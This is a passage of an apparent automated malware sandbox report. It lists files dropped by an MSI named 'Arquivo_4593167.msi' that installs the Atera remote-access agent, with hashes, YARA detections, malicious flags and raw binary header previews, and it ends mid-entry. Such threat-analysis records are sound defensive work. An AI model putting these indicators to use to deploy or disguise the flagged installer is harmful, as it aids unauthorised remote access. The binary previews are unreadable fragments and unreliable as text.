                                                                                                                                                                                                                                                                                                                                  SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                                                                  SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                                                                  SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                                                                  MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                                                                  SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                                                                  SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                                                                  SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC961.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1538
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                                                                  MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                                                                  SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                                                                  SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                                                                  SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC961.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):184240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                                                                  MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                                                                  SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                                                                  SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC961.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):711952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                                                                  MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                                                                  SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC961.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):61448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                                                                  MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                                                                  SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                                                                  SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                                                                  SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIDCAB.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):521954
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                                                                  MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                                                                  SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                                                                  SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                                                                  SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                                                                  MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                                                                  SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                                                                  SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                                                                  SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIDCAB.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1538
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                                                                  MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                                                                  SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                                                                  SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                                                                  SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIDCAB.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):184240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                                                                  MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                                                                  SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                                                                  SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIDCAB.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):711952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                                                                  MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                                                                  SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIDCAB.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):61448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                                                                  MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                                                                  SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                                                                  SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                                                                  SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIDEDF.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437342
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.648131145109059
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ht3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4KsA:/zOE2Z34KGzOE2Z34Kz
                                                                                                                                                                                                                                                                                                                                  MD5:2FCDFC2032D94DE5CB9DD0B261AD9992
                                                                                                                                                                                                                                                                                                                                  SHA1:5BCC5F36ABF8715B6A7F0123708E3069BE50CF96
                                                                                                                                                                                                                                                                                                                                  SHA-256:9F4489A6028EDEF0B3479D0936888BBDDC96B1A8344D951F96A1A31C344658A3
                                                                                                                                                                                                                                                                                                                                  SHA-512:5DE76598FF75543F84D8F67D53099ECBF4260DC953789B1E1A435D03C9D5A1A3F5D611B6E61490475D584A35200E6F377CECE698A7471A907AADC93FA5903005
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIDEDF.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIDEDF.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent..Arquivo_4593167.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[..............

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIDEEF.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):216496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                                                                  MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                                                                  SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                                                                  SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIDF3E.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):216496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
